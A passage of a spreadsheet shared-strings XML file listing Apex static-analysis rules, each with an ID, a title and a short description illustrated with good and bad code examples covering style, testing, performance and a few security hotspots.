    <t>Use Locale with Case Conversions</t>
  </si>
  <si>
    <t>When doing String.toLowerCase() or String.toUpperCase() conversions, use Locales to avoids problems with languages that
have unusual conventions, i.e. Turkish.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
class Foo {
 if (x.toLowerCase().equals('list')){ 	//Bad: This will not match 'LIST' when in Turkish locale.
 	//...
 }
 //The above could be..
 if (x.toLowerCase(Locale.US).equals('list')) ...
 ///or simply..
 if (x.equalsIgnoreCase('list')) ...
 String z = a.toLowerCase(Locale.EN); 	//Good.
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidUsingSeeAllData</t>
  </si>
  <si>
    <t>Avoid Using @IsTest(SeeAllData=true)</t>
  </si>
  <si>
    <t>Whenever possible, you should create test data for each test. Using SeeAllData=true makes it harder to manage the environment as data changes can break unit tests.
		&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyTestCase  {
	@isTest(seeAllData=true) //Bad: this is not recommended.
	public static void testWithAllData() {
	}
	@isTest(seeAllData=false) //Good: this is preferred.
	//Note: @isTest could have been left out in this case seeing as the class has 'testmethod' already.
	public static testMethod void testMyCase() {
	}
}
		&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidFieldNameMatchingTypeName</t>
  </si>
  <si>
    <t>Avoid Field Name Matching Type Name</t>
  </si>
  <si>
    <t>It is somewhat confusing to have a field name matching the declaring class name.
This probably means that type and/or field names should be chosen more carefully.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo extends Bar {
	Integer foo;	//Bad: there is probably a better name that can be used
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:JumbledIncrementer</t>
  </si>
  <si>
    <t>Jumbled Incrementer</t>
  </si>
  <si>
    <t>Avoid jumbled loop incrementers - its usually a mistake, and is confusing even if intentional.
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class JumbledIncrementerRule1 {
	public void foo() {
		for (Integer i = 0; i &lt; 10; i++) {			//Good: only references 'i'
			for (Integer k = 0; k &lt; 20; i++) {		//Bad: references both 'i' and 'k'
				system.debug('Hello');
			}
		}
	}
}
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidUsingHardCodedIP</t>
  </si>
  <si>
    <t>Avoid Using Hard Coded IP</t>
  </si>
  <si>
    <t>Applications with hard-coded IP addresses can become impossible to deploy in some cases.
&lt;br/&gt;
&lt;br/&gt;
This has led to the following vulnerabilities in the past:&lt;br/&gt;
&lt;br/&gt;
&lt;ul&gt;
	&lt;li&gt;CVE-2006-5901&lt;/li&gt;
	&lt;li&gt;CVE-2005-3725&lt;/li&gt;
&lt;/ul&gt;
&lt;br/&gt;
Externalizing IP adresses is preferable.
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
	&lt;li&gt;OWASP Top 10 2021 Category A2 - Cryptographic Failures&lt;/li&gt;
	&lt;li&gt;&lt;a href="https://wiki.sei.cmu.edu/confluence/display/java/MSC03-J.+Never+hard+code+sensitive+information"&gt;CERT, MSC03-J.&lt;/a&gt; - Never hard code sensitive information&lt;/li&gt;
&lt;/ul&gt;
	    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	private String ip = '127.0.0.1';     //Bad: IP should not be hard coded.
	public String GetIP(){
		return ServerSettings__c.getInstance().TheIP__c;  //Good: IP is fetched from custom settings. 
	}
}
	    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnusedModifier</t>
  </si>
  <si>
    <t>Unused Modifier</t>
  </si>
  <si>
    <t>Fields in interfaces are automatically public static final, and methods are public abstract.
Classes or interfaces nested in an interface are automatically public and static (all nested interfaces are automatically static).
For historical reasons, modifiers which are implied by the context are accepted by the compiler, but are superfluous.
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public interface Foo {
  public abstract void bar(); 		//Both abstract and public are ignored by the compiler.
  public static final Integer X = 0; 	//Public, static, and final all ignored.
  public static class Bar {} 		//Public and static are ignored.
  public static interface Baz {} 	//Public and static are ignored.
}
public class Bar {
  public static interface Baz {} 	//Static is ignored.
}
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UselessParentheses</t>
  </si>
  <si>
    <t>Useless Parentheses</t>
  </si>
  <si>
    <t>Useless parentheses should be removed.&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
   private Integer _bar1;
   private Integer _bar2;
   public void setBar(Integer n) {
      _bar1 = Integer.valueOf((n)); //Bad: parentheses around n should be removed here...
      _bar2 = (n); 					// ...and here
   }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidBranchingStatementAsLastInLoop</t>
  </si>
  <si>
    <t>Avoid Branching Statement As Last In Loop</t>
  </si>
  <si>
    <t>Using a branching statement as the last part of a loop may be a bug, and/or is confusing.
Ensure that the usage is not a bug, or consider using another approach.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
for (Integer i = 0; i &lt; 10; i++) {
	/*
	*do stuff
	*/
	if (i*i &lt;= 25) {    //Bad: This is a confusing implementation.
		continue;
	}
	break;
}
for (Integer i = 0; i &lt; 10; i++) {
	/*
	* do stuff
	*/
	if (i*i &gt; 25) {    //Good: This is clearer.
		break;
	}
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:TestClassWithoutTestCases</t>
  </si>
  <si>
    <t>Test Class without Test Methods</t>
  </si>
  <si>
    <t>Class is flagged as a Test Class but it doesn't contain any tests. Consider removing the class if it is no longer used, 
or removing the test flag if it is not a test class. 
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
@IsTest						//Bad: class doesn't contain any tests.
public class CarTest {
   public static void otherMethod(){
   }
   // code
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidSoqlWithoutLimits</t>
  </si>
  <si>
    <t>Avoid Calling SOQL Without a Where Clause or Limit Statement</t>
  </si>
  <si>
    <t>When working with very large amounts of data, unfiltered SOQL queries can quickly cause governer limit exceptions
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Something {
	public static void main( String as[] ) {  
		Account[] accs = [ select id from account ];  //Bad: if the amount of accounts grow beyond governor limits this may become a problem in the future.
	}
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:LawOfDemeter</t>
  </si>
  <si>
    <t>Law of Demeter</t>
  </si>
  <si>
    <t>The Law of Demeter is a simple rule, that says "only talk to friends". It helps to reduce coupling between classes
or objects.
&lt;br/&gt;
See also the references:
&lt;br/&gt;
*   Andrew Hunt, David Thomas, and Ward Cunningham. The Pragmatic Programmer. From Journeyman to Master. Addison-Wesley Longman, Amsterdam, October 1999.;&lt;br/&gt;
*   K.J. Lieberherr and I.M. Holland. Assuring good style for object-oriented programs. Software, IEEE, 6(5):38â€“48, 1989.;&lt;br/&gt;
*   &lt;a href="http://www.ccs.neu.edu/home/lieber/LoD.html"&gt;http://www.ccs.neu.edu/home/lieber/LoD.html&lt;/a&gt;&lt;br/&gt;
*	&lt;a href="http://en.wikipedia.org/wiki/Law_of_Demeter"&gt;http://en.wikipedia.org/wiki/Law_of_Demeter&lt;/a&gt;
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
    /**
     * This example will result in two violations.
     */
    public void example(Bar b) {
        //Good: This method call is ok, as b is a parameter of 'example'
        C c = b.getC();
        //Bad: This method call is a violation, as we are using c, which we got from B.
        // We should ask b directly instead, e.g. 'b.doItOnC();'
        c.doIt();
        //Bad: This is also a violation, just expressed differently as a method chain without temporary variables.
        b.getC().doIt();
        // a constructor call, not a method call.
        D d = new D();
        //Good: This method call is ok, because we have create the new instance of D locally.
        d.doSomethingElse(); 
    }
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:NcssConstructorCount</t>
  </si>
  <si>
    <t>NCSS Constructor Count</t>
  </si>
  <si>
    <t>This rule uses the NCSS (Non-Commenting Source Statements) algorithm to determine the number of lines
of code for a given constructor. NCSS ignores comments, and counts actual statements. Using this algorithm,
lines of code that are split are counted as one.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo extends Bar {
 public Foo() {			//this constructor only has 1 NCSS lines
     super();
      super.foo();
 }
}
   &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ForLoopsMustUseBraces</t>
  </si>
  <si>
    <t>For Loops Must Use Braces</t>
  </si>
  <si>
    <t>Avoid using 'for' statements without using curly braces. If the code formatting or 
indentation is lost then it becomes difficult to separate the code being controlled 
from the rest.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
for (Integer i = 0; i &lt; 42; i++)   //Bad: Not recommended.
   foo();
for (Integer i = 0; i &lt; 42; i++){  //Good: This is preferred.
   foo();
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:DoNotThrowExceptionInFinally</t>
  </si>
  <si>
    <t>Do Not Throw Exception in Finally</t>
  </si>
  <si>
    <t>Throwing exceptions within a 'finally' block is confusing since they may mask other exceptions 
or code defects.
		&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	public void bar() {
		try {
			// Here do some stuff
		} catch( Exception e) {
			// Handling the issue
		} finally {
			throw new Exception(); //Bad: this is not recommended.
		}
	}
}
    	&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:CallSuperInConstructor</t>
  </si>
  <si>
    <t>Call Super In Constructor</t>
  </si>
  <si>
    <t>It is a good practice to call super() in a constructor. If super() is not called but
another constructor (such as an overloaded constructor) is called, this rule will not report it.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo extends Bar{
  public Foo() {
    //do something...		//Bad: super is not called, this is not recommended.
  }
public class Foo extends Bar{
  public Foo() {
   super();					//Good: this is good practice.
  }
 public Foo(Integer code) {
  // do something with code
   this();					//Good: this is also OK.
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnnecessaryWrapperObjectCreation</t>
  </si>
  <si>
    <t>Unnecessary Wrapper Object Creation</t>
  </si>
  <si>
    <t>Most wrapper classes provide static conversion methods that avoid the need to create intermediate objects
just to create the primitive forms. Using these may avoid the cost of creating new objects.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public Integer convert(String s) {
  Integer i, i2;
  i = Integer.valueOf(s).intValue(); //Bad: this wastes an object.
  i = Integer.parseInt(s); 			 //Good: this is preferred.
  i2 = Integer.valueOf(i).intValue(); //Bad: this wastes an object.
  i2 = i; 							  //Good: this is preferred.
  String s3 = Integer.valueOf(i2).toString(); //Bad: this wastes an object.
  s3 = Integer.toString(i2); 				  //Good: this is preferred.
  return i2;
}
          &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UseSingleton</t>
  </si>
  <si>
    <t>Use Singleton</t>
  </si>
  <si>
    <t>For classes that only have static methods, consider making them Singletons.
Note that this doesn't apply to abstract classes, since their subclasses may
well include non-static methods.  Also, if you want this class to be a Singleton,
remember to add a private constructor to prevent instantiation.
This rule doesn't apply to classes having static methods with REST annotations.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MaybeASingleton {  //Bad: Not recommended.
  public static void foo() {}
  public static void bar() {}
}
public class MaybeASingleton {  //Good: A private constructor is prevents instantiation.
  private MaybeASingleton(){
	// ...
  }
  public static void foo() {}
  public static void bar() {}
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidCatchingGenericException</t>
  </si>
  <si>
    <t>Avoid Catching Generic Exceptions</t>
  </si>
  <si>
    <t>Avoid catching generic exceptions such as NullPointerException, RuntimeException, Exception in try-catch block&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/396.html"&gt;MITRE, CWE-396&lt;/a&gt; - Declaration of Catch for Generic Exception &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/BIB3AQ"&gt;CERT, ERR08-J.&lt;/a&gt; - Do not catch NullPointerException or any of its ancestors
  &lt;/li&gt;
&lt;/ul&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class PrimitiveType {
  public void downCastPrimitiveType() {
    try {
      system.debug(' i [' + i + ']');
    } catch(Exception e) {    //Bad: this is not recommended.
      System.debug(e.getMessage());
    } catch(RuntimeException e) { //Bad: this is not recommended.
      System.debug(e.getMessage());
    } catch(NullPointerException e) { //Bad: this is not recommended.
      System.debug(e.getMessage());
    }
  } 
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:HotspotUserInfoGetSessionIdUsage</t>
  </si>
  <si>
    <t>Using UserInfo.GetSessionId() Is Security-Sensitive</t>
  </si>
  <si>
    <t>The use of UserInfo.GetSessionId() is security-sensitive. Ensure that you need to do this.
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/807"&gt;MITRE, CWE-807&lt;/a&gt; - Reliance on Untrusted Inputs in a Security Decision &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2021 Category A7 - Identification and Authentication Failures &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
//Make sure you need to call the UserInfo.getSessionId() method.      
//....
HttpRequest req = new HttpRequest();
req.setHeader('Authorization', 'Bearer ' + UserInfo.getSessionId());   //There may be a workaround for this.
//....
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>SECURITY_HOTSPOT</t>
  </si>
  <si>
    <t>sf:VariableNamingConventions</t>
  </si>
  <si>
    <t>Variable Naming Conventions</t>
  </si>
  <si>
    <t>A variable naming conventions rule - customize this to your liking.  Currently, it
checks for final variables that should be fully capitalized and non-final variables
that should not include underscores.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
   public static final Integer MY_NUM = 0;  //Good: 'final' variable is fully capitalised.
   public String myTest = '';				//Good: 'non-final' variable has no underscores.
   DataModule dmTest = new DataModule();
   public static final Integer newNum = 2;  //Bad: 'final' variable is named in camel-case.
   public String NEW_TEST = '';				//Bad: 'non-final' variable has underscores and is captalised.
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidSOQLInControllerGetter</t>
  </si>
  <si>
    <t>Avoid SOQL in Controller Getter Methods</t>
  </si>
  <si>
    <t>Lazy loading of objects is recommended. This will help to reduce page load times.
See &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_best_practices_performance.htm"&gt;Best Practices for Improving Visualforce Performance&lt;/a&gt;
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
class MyController {
	public function getLines(){
		return [ select ... ]; //BAD -
	}
	private transient List&lt;Account&gt; accounts;
	public function getLines(){
		if ( accounts == null ){
			accounts = [ select .. ]; //GOOD - lazy fetching once
		}
		return accounts;
	}
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AssignmentToNonFinalStatic</t>
  </si>
  <si>
    <t>Assignment To Non Final Static</t>
  </si>
  <si>
    <t>Identifies a possible unsafe usage of a static field.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class StaticField {
   static Integer x;
   public FinalFields(Integer y) {
    x = y; 		//Bad: This is unsafe. x is assigned to an unknown parameter.
   }
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ControllerNaming</t>
  </si>
  <si>
    <t>Controller Naming Convention</t>
  </si>
  <si>
    <t>Controller class names should end with "Controller". Only classes linked to a page as a controller or extension are considered.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {  //Bad: not recommended.
  //....
}
public class FooController{  //Good: Purpose of the class is clear.
  //....
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidInstanceofChecksInCatchClause</t>
  </si>
  <si>
    <t>Avoid Instanceof Checks in Catch Clause</t>
  </si>
  <si>
    <t>Each caught exception type should be handled in its own catch clause.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
try { 						//Bad: Avoid this.
 // do something
} catch (Exception ee) {
 if (ee instanceof IOException) {
  cleanup();
 }
}
try {  						//Good: This is preferred.
 // do something
} catch (IOException ee) {
 cleanup();
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UseAssertInsteadOfAssertEquals</t>
  </si>
  <si>
    <t>Use System.Assert instead of System.assertEquals</t>
  </si>
  <si>
    <t>When asserting a value is the same as a boolean literal, use System.assert, instead of System.assertEquals.
		&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyTestCase  {
	public static testMethod void testMyCase() {
		boolean myVar = true;
		System.assert(myVar, 'myVar is true'); 		//Good: this is preferred.
		System.assertEquals(true, myVar, 'myVar is true');  //Bad: this is not recommended.
	}
}
		&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:MethodCouldBeStatic</t>
  </si>
  <si>
    <t>Method Could Be Static</t>
  </si>
  <si>
    <t>Methods that make sense to call outside an object being created can be converted to static.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyHelper{
 private boolean newBool= true;
 public MyHelper(){}
  public Contact convertLead(Lead newLead){    // This method could be static. 
    //do stuff ...
    return newContact;		
  }
  public boolean getNewBool(){ 				//This method needs instantiation of an object.
    return newBool;
  }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UseAssertEqualsInsteadOfAssert</t>
  </si>
  <si>
    <t>Use System.assertEquals instead of System.assert</t>
  </si>
  <si>
    <t>This rule detects Unit test assertions in object references equality. 
Instead of using System.assert combined with ".equals()" as an equality check, these assertions should be made 
by more specific methods, like assertEquals.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class FooTest extends TestCase {
 void testCode() {
  Object a, b;
  System.assert(a.equals(b)); //Bad: not recommended.
  System.assertEquals(a, b);  //Good: this is preferred.
 }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:URDataflowAnomalyAnalysis</t>
  </si>
  <si>
    <t>Variable Not Assigned</t>
  </si>
  <si>
    <t>The dataflow analysis tracks local definitions, undefinitions and references to variables on different paths on the data flow.
Various problems can be deduced from this information. Please note: If a variable's first use is being checked that if it is null, the variable should be assigned null when it is created.
UR - Anomaly: There is a reference to a variable that was not defined before. This is a bug and leads to an error.
          &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
 void bar() {
  Integer buzz;
  if (buzz == 0) {}  //Bad: buzz is not defined, this is a UR-Anomaly.
 }
}
          &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:OnlyOneReturn</t>
  </si>
  <si>
    <t>Methods Should Not Have Too Many Return Statements</t>
  </si>
  <si>
    <t>Having too many return methods increases a methods complexity.
      A method should ideally have only one exit point, and that should be the last statement in the method.
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class OneReturnOnly1 {
  public String foo(Integer x) {
    if (x &gt; 0) {
      return 'hey';   
    }
    return 'hi';	//Bad: Method has two exit points.
  }
  public String bar(Integer x {
    String result = 'hi';
    if(x &gt; 0){
      result = 'hey';
    }
    return result;		//Good: Method has one exit point.
  }
}
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnnecessaryCaseChange</t>
  </si>
  <si>
    <t>Unnecessary Case Change</t>
  </si>
  <si>
    <t>Using equalsIgnoreCase() is faster than using toUpperCase()/toLowerCase().equals()
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
boolean answer1 = buz.toUpperCase().equals('BAZ');          //Bad: should be buz.equalsIgnoreCase('baz').
boolean answer2 = buz.toUpperCase().equalsIgnoreCase('baz');  //Bad:this is another unnecessary toUpperCase().
boolean answer3 = buz.equalsIgnoreCase('baz')               //Good: this is preferred.
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmptyMethodInAbstractClassShouldBeAbstract</t>
  </si>
  <si>
    <t>Empty Method in Abstract Class should be Abstract</t>
  </si>
  <si>
    <t>Empty methods in an abstract class should be tagged as abstract. This helps to remove their inappropriate 
usage by developers who should be implementing their own versions in the concrete subclasses. 
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public abstract class ShouldBeAbstract {
    public Object couldBeAbstract()  {		//Bad: Method should be abstract.
			return null;
	}
	public void couldBeAbstract()  {
    }
}
    	&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ImmutableField</t>
  </si>
  <si>
    <t>Immutable Field</t>
  </si>
  <si>
    <t>Identifies private fields whose values never change once they are initialized either in the declaration 
of the field or by a constructor.  Making these fields final helps in converting existing classes to becoming immutable ones.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  private Integer x; 	//Bad: x could be made final. 
  public Foo() {
      x = 7;
  }
  public void foo() {
     Integer a = x + 2;
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UseAssertEqualsInsteadOfAssertEquality</t>
  </si>
  <si>
    <t>This rule detects unit test assertions in object references equality. 
Instead of using System.assert combined with "==" as an equality operator,
these assertions should be made by more specific methods, like assertEquals.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class FooTest extends TestCase {
 void testCode() {
  Object a, b;
  System.assert(a == b); 		//Bad: not recommended.
  System.assertEquals(a, b);    //Good: this is preferred.
 }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:InefficientEmptyStringCheck</t>
  </si>
  <si>
    <t>Inefficient Empty String Check</t>
  </si>
  <si>
    <t>String.trim().length() is an inefficient way to check if a String is really empty, as it
creates a new String object just to check its size. Consider using String.isWhitespace() which
checks if the String contains only white space characters or is empty
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void bar(String string) {
	if (string != null &amp;&amp; string.trim().size() &gt; 0) {  //Bad: This is not recommended.
		doSomething();
	}
	if (string != null &amp;&amp; !string.isWhitespace() ) {  //Good: This is preferred.
		doSomething();
	}
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:NcssTypeCount</t>
  </si>
  <si>
    <t>NCSS Type Count</t>
  </si>
  <si>
    <t>This rule uses the NCSS (Non-Commenting Source Statements) algorithm to determine the number of lines
of code for a given type. NCSS ignores comments, and counts actual statements. Using this algorithm,
lines of code that are split are counted as one.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo extends Bar {		//this class only has 6 NCSS lines
 public Foo() {
     super();
      super.foo();
 }
}
   &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidCatchingNPE</t>
  </si>
  <si>
    <t>Avoid Catching NPE</t>
  </si>
  <si>
    <t>Code should never throw NullPointerExceptions under normal circumstances.  A catch block may hide the original error, causing other, more subtle problems later on.
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/395.html"&gt;MITRE, CWE-395&lt;/a&gt; -Use of NullPointerException Catch to Detect NULL Pointer Dereference&lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/BIB3AQ"&gt;CERT, ERR08-J.&lt;/a&gt; - Do not catch NullPointerException or any of its ancestors&lt;/li&gt;
&lt;/ul&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;  
public class Foo {
  void bar() {
    try {
      // do something
      }  catch (NullPointerException npe) {  Bad: this is not recommended.
    }
  }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidFinalLocalVariable</t>
  </si>
  <si>
    <t>Avoid Final Local Variable</t>
  </si>
  <si>
    <t>Avoid using final local variables, turn them into fields.
         &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyClass {
  final String finalField;  //Good: This is preferred.
  public void foo() {
        final String finalLocalVariable;  //Bad: Consider making this a field instead of a local variable.
  }
}
	     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:CollapsibleIfStatements</t>
  </si>
  <si>
    <t>Collapsible If Statements</t>
  </si>
  <si>
    <t>Sometimes two consecutive 'if' statements can be consolidated by separating their conditions with a boolean short-circuit operator.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
void bar() {
	if (x) {			//Bad: The nested 'if' statement isn't required.
		if (y) {
			// do stuff
		}
	}
	if (x &amp;&amp; y) {		//Good: The two previous 'if' statements can be combined with a boolean short-circuit operator.
		// do stuff
	}
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidDeeplyNestedIfStmts</t>
  </si>
  <si>
    <t>Avoid Deeply Nested If Statements</t>
  </si>
  <si>
    <t>Avoid creating deeply nested 'if..then' statements since they are error-prone, harder to read and harder to maintain.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public void bar(Integer x, Integer y, Integer z) {
    if (x&gt;y) {
      if (y&gt;z) {
        if (z==x) {
         //Bad: This is too deep!
        }
      }
    }
  }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:DirectAccessToTriggerArray</t>
  </si>
  <si>
    <t>Trigger.new and Trigger.old array elements should not be accessed directly.</t>
  </si>
  <si>
    <t>The number of elements in a trigger can change so accessing the trigger array directly may suggests a bug.  
  Updating more than one account may mean that your trigger may not perform correctly. It also may mean that your trigger code is not bulkified.
 &lt;br/&gt;
Read more here:  &lt;a href ="https://developer.salesforce.com/page/Trigger_Frameworks_and_Apex_Trigger_Best_Practices"&gt;https://developer.salesforce.com/page/Trigger_Frameworks_and_Apex_Trigger_Best_Practices&lt;/a&gt;
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
trigger AccountTrigger on Account (before insert, before update) {
   Account a = Trigger.new[0]; //Bad: Accessing the trigger array directly is not recommended.
   foreach ( Account a : Trigger.new ){   //Good: Iterate through the trigger.new array instead.
   }
}
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnusedLocalVariable</t>
  </si>
  <si>
    <t>Unused Local Variable</t>
  </si>
  <si>
    <t>Detects when a local variable is declared and/or assigned, but not used.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	public void doSomething() {
		Integer i = 5; //Bad: this variable is unused.
	}
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UselessOperationOnImmutable</t>
  </si>
  <si>
    <t>Useless Operation On Immutable</t>
  </si>
  <si>
    <t>An operation on an Immutable object (String, Date, DateTime or Time) won't change the object itself
since the result of the operation is a new object. Therefore, ignoring the operation result is an error.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
class Test {
  void method1() {
    String a=new String('a');
    a.concat('b'); 		//Bad: String.concat is immutable and will not modify a.
  }
  void method2() {
    String a=new String('a');
    a = a.concat('b'); 		//Good: this is probably what you meant to do.
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:DUDataflowAnomalyAnalysis</t>
  </si>
  <si>
    <t>Potentially Unused Variable</t>
  </si>
  <si>
    <t>The dataflow analysis tracks local definitions, undefinitions and references to variables on different paths on the data flow.
From those informations there can be found various problems.
DU - Anomaly: A recently defined variable is undefined. These anomalies may appear in normal source text.
          &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
 void bar() {
  Integer buz = 0;		//Bad: buz is undefined when leaving scope, this is a DU-Anomaly.
 }
}
          &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:FinalFieldCouldBeStatic</t>
  </si>
  <si>
    <t>Final Field Could Be Static</t>
  </si>
  <si>
    <t>If a final field is assigned to a compile-time constant it could be made static, thus saving overhead 
in each object at runtime.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public final Integer BAR = 42; //Bad: BAR could be static to save some memory.
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:SimplifyConditional</t>
  </si>
  <si>
    <t>Unnecessary Null Check with instanceOf</t>
  </si>
  <si>
    <t>There is no need to check for 'null' before an 'instanceof'. The 'instanceof' keyword will return 'false' when given a 'null' argument.
          &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
class Foo {
  void bar(Object x) {
    if (x != null &amp;&amp; x instanceof Bar) { 	//Bad: The 'x != null' check is not needed.
		doStuff();
    }
  }
}      
           &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UseAnnotationOnTestClass</t>
  </si>
